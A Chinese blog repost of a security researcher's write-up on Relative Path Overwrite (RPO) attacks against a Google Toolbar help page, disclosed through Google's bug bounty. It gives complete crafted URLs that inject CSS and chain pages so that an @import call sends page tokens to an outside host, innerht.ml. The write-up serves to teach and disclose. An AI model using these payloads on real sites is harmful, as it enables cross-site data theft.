CSS RPO Gadgets

最新推荐文章于 2022-10-12 12:01:44 发布
最新推荐文章于 2022-10-12 12:01:44 发布
阅读量1.3k 收藏
点赞数
分类专栏: HITCON 2016 文章标签: css RPO

RPO Gadgets

这篇文章并不是讲述Return Oriented Programming (ROP),误入的可以点右上角的红叉了。由于我想介绍的技术是Relative Path Overwrite (RPO)的进阶课程,如果没有基础的同学可以查看original introduction by Gareth 和 a real life RPO bug in phpBB by James.

Identifying RPO

目前我们可以知道的RPO利用例子是James的PRSSI ,它依赖于CSS解析器容忍在quirks mode中的非法语法(也称为松散解析),所以查找RPO漏洞的第一步就是检查页面的是否有正确的doctype。

我找到一个目标:
http://www.google.com/tools/toolbar/buttons/apis/howto_guide.html

<html>  
<head>  
<title>Google Toolbar API - Guide to Making Custom Buttons</title>  
<link href="../../styles.css" rel="stylesheet" type="text/css" />  
[..]

第二步涉及到服务器如何解析路径。对于浏览器来说,目录之间被“/”隔开。对于服务器来说,这并不意味着一定是目录,比如说JSP接收参数时会将“;”后的内容全部视为参数 (e.g. http://example.com/path;/notpath),这种情况下浏览器只会认为/patn;/notpath依旧是目录。

在目标中我找到可以利用RPO的地方,那里似乎有一个代理处理请求并解码路径中的内容,然后将其发送到真正的服务器。 这允许我们在路径中用%2f替换斜杠:

http://www.google.com/tools/toolbar/buttons/apis%2fhowto_guide.html

这里写图片描述

Server:
/tools/toolbar/buttons/apis/ howto_guide.html
Browser:
/tools/toolbar/buttons/ apis%2fhowto_guide.html
Imported stylesheet:
/tools/ style.css
(加粗的表示为基本路径)

现在浏览器认为基本路径是/tools/toolbar/buttons/而不是/tools/toolbar/buttons/apis/,因此对../../style.css的引用会多跳一个目录。

我们还能伪造目录,比如我们想加载的css文件在/tools/fake/styles.css:http://www.google.com/tools/fake/..%2ftoolbar/buttons/apis%2fhowto_guide.html

Server:
/tools/ (fake/../抵消) toolbar/buttons/apis/ howto_guide.html
Browser:
/tools/fake/..%2ftoolbar/buttons/ apis%2fhowto_guide.html
Imported stylesheet:
/tools/fake/..%2ftoolbar/buttons/../../style.css

这里我们添加了二个虚拟目录:fake和..%2f,这样在server角度下就互相抵消了,然后浏览器认为fake和..%2ftoolbar为目录。理论上,我们可以在根目录下导入任何样式表(www.google.com/*/styles.css),不幸的是这个代理只能处理(www.google.com/tools/*/styles.css),不是tools目录中的css文件就无法导入。

除了按钮Gallery 外都是些静态元素,http://www.google.com/tools/toolbar/buttons/gallery会重定向到http://www.google.com/gadgets/directory?synd=toolbar&frontpage=1
按钮Gallery有一个q参数,可以制作RPO的payload:http://www.google.com/gadgets/directory?synd=toolbar&frontpage=1&q=%0a{}*{background:red}

效果如图所示:
这里写图片描述

现在要做的就是如何以CSS方式来加载该页面。一种方法就是重定向处理查询字符串,例如,http://www.google.com/tools/toolbar/buttons/gallery?foo=bar会将我们重定向到http://www.google.com/gadgets/directory?synd=toolbar&frontpage=1&foo=bar, 查询的字符串会附加上。

最后一步就是构造查询字符串了:http://www.google.com/tools/toolbar/buttons%2fgallery%3fq%3d%250a%257B%257D*%257Bbackground%253Ared%257D/..%2f/apis/howto_guide.html

Server:
/tools/toolbar/buttons/ (gallery?q=%0a{}*{background:red}/../抵消) /apis/ howto_guide.html

Browser:
/tools/toolbar/buttons%2fgallery%3fq%3d%250a%257B%257D*%257Bbackground%253Ared%257D/..%2f/apis/ howto_guide.html

Imported stylesheet:
/tools/toolbar/buttons%2fgallery%3fq%3d%250a%257B%257D*%257Bbackground%253Ared%257D /..%2f/apis/../../style.css

/tools/toolbar/buttons/gallery?q=%0a{}*{background:red}/style.css

/gadgets/directory?synd=toolbar&frontpage=1&q=%0a{}*{background:red}/style.css

这里写图片描述

看成功了,满页面都是红色。我们还能使用expression(alert(document.domain)),在IE8可以成功弹窗,但是在IE9却失败了。那是因为谷歌的defense-in-depth防止按钮以css方式加载(X-Content-Type-Options:nosniff 选项来关闭IE的文档类型自动判断功能)。
突然间所有的努力都是徒劳的,因为Google漏洞奖励计划(VRP)规则清楚地表明:In particular, we exclude Internet Explorer prior to version 9

Chaining Gadgets

嗯,如果我们使用RPO窃取其他页面上的秘密呢? CSS的另一个有趣的事情是,在quirks mode下,只要它们在同一个起源,那么松散解析就适用于所有导入的样式表。这样就开启了一个新的可能性,因为我们可以使用Button Gallery作为小工具将https://www.google.com/*上的任何网页导入为样式表,如果导入的“样式表”包含隐私数据和注入点,我们可以 尝试通过注入CSS魔法来窃取它。

这样的页面要求是:

  • 注入点需要在隐私数据之前
  • 注入点需要允许%0a,%0c和%0d中的任何一个,以便可以从错误的状态恢复解析器状态
  • 隐私数据及其周围不能包含换行符

我花了些时间找到了符合的页面:http://www.google.com/search?nord=1&q={}%0a@import”//innerht.ml?

这里写图片描述

首先要注意的是,该页面针对速度进行了优化,因此HTML被压缩过,只有少数换行符。可以看到有一些随机生成的token。 我不知道他们代表什么,但是能够窃取他们应该足以证明这次攻击确实会渗透到数据中。截图中突出显示的部分是css魔术发生的地方:我们使用@import“// innerht.ml?创建import规则,然后直到双引号的所有内容将作为受控URL的一部分使用,最后浏览器会向import“URL”发出请求,我们就可以获取到数据内容。
http://www.google.com/tools/toolbar/buttons%2fgallery%3fq%3d%250a%257B%257D%2540import%2527%252Fsearch%253Fnord%253D1%2526q%253D%257B%257D%25250a%2540import%252527%252F%252Finnerht.ml%253F%2522/..%2f/apis/howto_guide.html

这里写图片描述

再次向google上报:

** NOTE: This is an automatically generated email **

Hello,

Thank you for reporting this bug. As part of Google's Vulnerability Reward Program, the panel has decided to issue a reward of $1337.

Conclusion

我相信这应该是在实践中首次成功执行的RPO攻击。 最重要的是,我希望这篇文章可以让您深入了解RPO如何在没有XSS的情况下工作,以及如何识别RPO漏洞。

翻译出处
http://blog.innerht.ml/rpo-gadgets/

aetkrad
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
RTO 与 RPO
weixin_34067049的博客
12-11 872
在灾难恢复方面,目前业界公认有三个目标值得努力。一是恢复时间,企业能忍受多长时间没有 IT,处于停业状态;二是网络多长时间能够恢复;三是业务层面的恢复。整个恢复过程中,最关键的衡量指标有两个:一个是 RTO,另一个是 RPO。所谓 RTO,Recovery Time Objective,它是指灾难发生后,从 IT 系统当机导致业务停顿之时开始,到 IT 系统恢复至可以支持各部...
RPO技巧拓展】————4、RPO
Fly_鹏程万里
01-31 507
相对VS绝对 RPO(相对路径覆盖)是一种通过覆盖目标文件来利用相对URL的技术。要理解该技术,我们必须首先研究相对URL和绝对URL之间的差异。绝对URL基本上是目标地址的完整URL,包括协议和域名,而相对URL不指定域或协议,并使用现有目标来确定协议和域。 绝对网址:https://hackvertor.co.uk/public 相对URL:public / somedirectory ...
RPO和RTO是什么?
数据库生态圈(RDB & NoSQL & Bigdata)——专注于关系库优化(Oracle&Mysql&PG&SQL Server )
10-12 4927
本文对RTO和RPO的概念进行了详细的解释说明,记录于此,供各位同学及自己参考研究。
RPO技巧拓展】————2、Detecting and exploiting path-relative stylesheet import (PRSSI) vulnerabilities
Fly_鹏程万里
01-31 2055
去年年初,Gareth Heyes推出了一种引人入胜的新技术,通过利用路径相对样式表导入来攻击Web应用程序,并将其称为“ 相对路径覆盖 ”。此攻击通过滥用许多常见Web语言和框架的路径处理功能,欺骗浏览器将HTML页面导入为样式表。由于极其宽容的样式表解析,这可以经常用于注入恶意CSS和劫持用户帐户。 这种技术目前非常深奥,因此对于已经接受过专业或众包审计的网站来说,它通常很有效。然而,在...
rpo
03-19
在IT行业中,"rpo"通常指的是恢复点目标(Recovery Point Objective),它是一个关键的业务连续性和灾难恢复(BC/DR)概念。恢复点目标定义了在发生故障或灾难时,系统或数据需要恢复到的最远时间点,以确保业务连续...
RPO_专案
02-12
在IT行业中,"RPO"通常代表"恢复点目标"(Recovery Point Objective),这是一个关键的业务连续性和灾难恢复术语。RPO_专案可能是一个专门针对如何在系统故障或灾难发生时,确保数据和业务功能能够恢复到特定时间点...
容灾&RTO&RPO
12-03
容灾&RTO&RPO之间的平衡 容灾系统是指企业为了保护自己的数据和应用程序,而建立的一种系统,以防止灾难的发生和减少灾难的影响。容灾系统的设计指标主要与容灾系统的数据恢复能力有关,最常见的设计指标有 RTO 和 ...
rpo_fclient
03-19
在IT行业中,"rpo_fclient"可能是一个特定项目的名称,该项目与RPO(恢复点目标,Recovery Point Objective)有关。RPO是灾难恢复计划中的一个重要概念,它定义了在发生故障或灾难时,系统或数据必须恢复到的最远...
RPO 执行手册.pdf
05-23
RPO 执行手册.pdf RPO( Recruitment Process Outsourcing)执行手册是指企业招聘过程中,外包招聘服务的执行手册。该手册涵盖了RPO项目的执行流程、项目团队人员配备、候选人资源存量分析、项目启动、候选人寻访与...
相对路径覆盖漏洞攻击RPO详解
Cwillchris的博客
09-26 4034
此攻击方法依赖于浏览器和服务器的反应,基于服务器的Web缓存技术和配置差异,以及服务器和客户端浏览器的解析差异,利用前端代码中加载的css/js的相对路径来加载其他文件,最终浏览器将服务器返回的不是css/js的文件当做css/js来解析,从而导致XSS,信息泄露等漏洞产生。这就是相对路径覆盖攻击, 我们成功用/aaa目录下的b.js覆盖掉了a.html中静态资源b.js的路径.如果我们控制网站根目录下的aaa的目录下面的b.js的内容,写入/aaa/b.js内容如下。输入如下代码,保存退出。
RPO 相对路径覆盖攻击
hl1293348082的专栏
05-31 2090
RPO (Relative Path Overwrite) 相对路径覆盖,最早由 Gareth Heyes 在其发表的文章中提出。主要是利用浏览器的一些特性和部分服务端的配置差异导致的漏洞,通过一些技巧,我们可以通过引入相对路径来引入其他资源文件,以达到我们的目的。 漏洞成因: RPO 依赖于浏览器和网络服务器的反应,基于服务器的 Web 缓存技术和配置差异,以及服务器和客户端游览器的解析差异,利用前端代码中加载的 css/js 的相对路径来加载其他文件,最终浏览器将服务器返回的不是 css/js 文件
Web安全之SSRF漏洞
热门推荐
我不是大牛
07-04 2万+
内容 SSRF漏洞的危害 SSRF漏洞的挖掘 SSRF漏洞的防御 SSRF漏洞原理概述 背景 SSRF(Server-Side Request Forgery:服务器端请求伪造) 是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。一般情况下,SSRF攻击的目标是从外网无法访问的内部系统。 概述 很多Web应用都提供了从其他服务器上获取数据的功能。使用用户指定的URL,Web应用可以获取图片...
无线信号强度分析
achejq的专栏
06-30 1万+
原创作品,允许转载,转载时请务必以超链接形式标明文章 原始出处 、作者信息和本声明。否则将追究法律责任。http://dalipc.blog.51cto.com/1856667/351639 mw   功率单位     dBm dBm是一个考征功率绝对值的值,计算公式为:10lgP(功率值/1mw)。 [例1] 如果发射功率P为1mw,折算为dBm后为0dBm。 [例2]
RSSI、dB、dBm
CoolBreeze的博客
05-31 1万+
RSSI:Received Signal Strength Indication接收的信号强度指示,无线发送层的可选部分,用来判定链接质量,以及是否增大广播发送强度。因为无线信号多为mW级别,所以对它进行了极化,转化为dBm而已,不表示信号是负的。1mW就是0dBm,小于1mW就是负数的dBm数。接收的信号强度指示:RSSI只是信号强度的一个指示值!    指示体现在两方面:   1) RSSI的...
一文带你了解 RTO 和 RPO
Leo的博客
01-12 2万+
RTO 和 RPO 都是企业灾难恢复(Disaster Recovery, DR)需要考虑的关键指标,这两个指标可以用来指导企业来制定合适的业务系统服务或数据的恢复方案。 本文介绍 RTO 和 RPO 的概念以及区别。 图:RPO(Recovery point object) 和 RTO(Recovery time object)是提供业务连续性的关键指标 RTO RTO,Recovery ti...
灾备系统建设指标:RTO、RPO
weixin_42330461的博客
06-20 2万+
如今,数据安全的重要对于企业单位来说已不言而喻,说到数据安全,必然绕不过容灾备份,而提到容灾备份,其中有两个关键指标必须有所了解:RTO和RPO。RTO和RPO是灾难恢复方面的重要参考指标。现在企业对业务的连续性有苛刻要求,但故障不可避免,一旦发生了故障就需要启动备份机制,确保业务的连续性,所以现在较为完善的容灾机制,RTO和RPO可以很好地反映出容灾性能如何。这两个参数是在运维过程中,一定要重点...
TRO与RPO的平衡
achejq的专栏
01-17 2169
许多企事业单位虽然已经认识到信息安全的重要性,却迟迟没有行动。其中的原因是多方面的,最主要的一个原因就是在如何建立容灾系统的问题上存在种种疑惑。容灾设计指标主要与容灾系统的数据恢复能力有关,最常见的设计指标有RTO 和RPORPO是指能把数据恢复到过去的那一个时间点,RTO 是指在出现问题后“什么时候”可以恢复数据。   RPO可简单地描述为企业能容忍的最大数据丢失量。为了更好地理解,可以
RPO漏洞学习
weixin_30347335的博客
08-28 425
Internet Explorer存在URL问题 处理URL很容易搞砸。有时,应用程序的URL验证中的轻微不准确可能会导致轻微问题,或者如果浏览器混淆了漏洞则会导致漏洞。这次,将介绍与Internet Explorer有问题的URL重定向相关的两个错误,帖子的后半部分将介绍一种有趣的RPO开发技术 GitHub OAuth Code Theft URL编码或百分号编码通常用于查询字符串或请求正文中...
rto,rpo 怎么设置合理
最新发布
06-11
RTO(重传超时时间)和 RPO(恢复点目标)都是网络通信中的重要参数。 RTO 的设置需要考虑以下因素: 1. 网络延迟:RTO 的值应该大于网络延迟时间,否则可能会导致发送方在等待 ACK 时过早地重传数据包。 2. 网络抖动:RTO 的值应该考虑到网络抖动的影响,如果网络抖动较大,RTO 的值也应该相应地设置大一些。 3. 数据包大小:RTO 的值应该考虑到数据包的大小,如果数据包较大,RTO 的值也应该相应地设置大一些。 一般来说,RTO 的初始值应该设置为一个较小的值,然后根据网络状况的变化进行动态调整。如果网络延迟较小且网络抖动较小,可以考虑将 RTO 的值设置为 1 秒左右;如果网络延迟较大或者网络抖动较大,可以将 RTO 的值设置为 3 秒左右。 RPO 的设置需要考虑以下因素: 1. 数据重要性:RPO 的值应该根据数据的重要性来设置,对于非常重要的数据,RPO 的值应该尽可能地小。 2. 数据恢复时间:RPO 的值应该考虑到数据的恢复时间,如果恢复时间较长,RPO 的值也应该相应地设置大一些。 3. 数据备份频率:RPO 的值应该根据数据备份的频率来设置,如果备份频率较低,RPO 的值也应该相应地设置大一些。 一般来说,RPO 的值应该根据具体的业务需求和数据特点来设置,需要进行综合考虑。对于一些非常重要的数据,可以考虑采用实时备份的方式来保证数据的安全。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值